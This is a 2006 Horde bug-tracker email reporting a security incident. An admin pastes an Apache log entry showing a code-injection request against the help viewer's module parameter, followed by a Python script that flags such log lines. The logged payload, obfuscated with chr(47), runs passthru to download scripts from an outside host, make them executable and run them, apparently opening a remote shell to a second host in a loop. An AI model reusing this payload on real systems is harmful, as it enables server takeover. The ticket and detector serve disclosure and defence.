[Tickets #3856] NEW: security issue

bugs@bugs.horde.org bugs at bugs.horde.org
Sat Apr 29 18:44:58 PDT 2006


DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: http://bugs.horde.org/ticket/?id=3856
-----------------------------------------------------------------------
 Ticket             | 3856
 Created By         | admin at cw3host.com
 Summary            | security issue
 Queue              | IMP
 Version            | HEAD
 State              | Unconfirmed
 Priority           | 3. High
 Type               | Bug
 Owners             | 
-----------------------------------------------------------------------


admin at cw3host.com (2006-04-29 18:44) wrote:

Found this in my logs after cleaning out hacker files in TMP directory.
Server type is Red Hat Linux running H-Sphere.

/hsphere/shared/apache/htdocs//horde//services/help/index.php 216.65.11.137
- - [28/Apr/2006:10:00:12 -0500] "GET
//horde//services/help/?show=about&module=;\".passthru(\"wget%20http:\".chr(
47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping.txt;mv%20p
ing.txt%20temp2006;perl%20temp2006%20217.160.242.90%20801;wget%20http:\".chr
(47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+
x%20ping;.\".chr(47).\"ping%20217.160.242.90%208081;curl%20-o%20ping%20http:
\".chr(47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chm
od%20+x%20ping;.\".chr(47).\"ping%20217.160.242.90%208081;cd%20\".chr(47).\"
tmp\".chr(47).\";curl%20-o%20temp2006%20http:\".chr(47).\"\".chr(47).\"81.58
.26.26\".chr(47).\"libsh\".chr(47).\"ping.txt;while%20[%201%20];do%20perl%20
temp2006%20217.160.242.90%208081;done;wget%20http:\".chr(47).\"\".chr(47).\"
81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+x%20ping;.\".chr(47)
.\"ping%20217.160.242.90%208081;curl%20-o%20ping%20http:\".chr(47).\"\".chr(
47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+x%20ping;.\".c
hr(47).\"ping%20217.160.242.90%208081\");'. HTTP/1.1" 200 3452 "-" "-"
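
Added example, not part of the ticket or of Horde's code: a log triage check that flags help-viewer requests whose decoded `module` parameter is not a plain identifier, as in the entry above. The allowlist pattern, the function name `suspicious_help_requests` and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix; the request field may hold backslash-escaped quotes.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) '
)
HELP_PATH = re.compile(r'/+services/+help/*(index\.php)?$')
# Assumption: a legitimate module value is a plain application name such as "imp".
SAFE_MODULE = re.compile(r'[A-Za-z0-9_-]{1,64}')

# Constructed sample lines (documentation addresses, shortened placeholder payload).
SAMPLE = r'''
192.0.2.10 - - [28/Apr/2006:09:58:01 -0500] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 3120 "-" "-"
192.0.2.77 - - [28/Apr/2006:10:00:12 -0500] "GET //horde//services/help/?show=about&module=;\".passthru(\"EXAMPLE\");'. HTTP/1.1" 200 3452 "-" "-"
198.51.100.5 - - [28/Apr/2006:10:03:40 -0500] "GET /horde/services/help/index.php?module=imp%3Bx&show=about HTTP/1.1" 200 3452 "-" "-"
192.0.2.10 - - [28/Apr/2006:10:05:00 -0500] "GET /horde/imp/mailbox.php?module=;x HTTP/1.1" 200 100 "-" "-"
'''.strip().splitlines()


def suspicious_help_requests(lines):
    """Return (host, time, status, module) for help-viewer requests whose
    decoded module parameter is not a plain identifier."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we can parse
        # Request field is "METHOD target HTTP/x.y"; keep only the target.
        _, _, rest = m.group('request').partition(' ')
        target = rest.rsplit(' HTTP/', 1)[0]
        path, _, query = target.partition('?')
        if not HELP_PATH.search(path):
            continue  # only the help viewer is in scope here
        for pair in query.split('&'):
            key, _, value = pair.partition('=')
            module = unquote(value)  # catch percent-encoded metacharacters too
            if key == 'module' and not SAFE_MODULE.fullmatch(module):
                hits.append((m.group('host'), m.group('time'), m.group('status'), module))
    return hits


if __name__ == '__main__':
    for hit in suspicious_help_requests(SAMPLE):
        print(hit)
```

The status code is returned with each hit because a 200 response, as in the reported entry, is a reason to check the host for dropped files and outbound connections.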



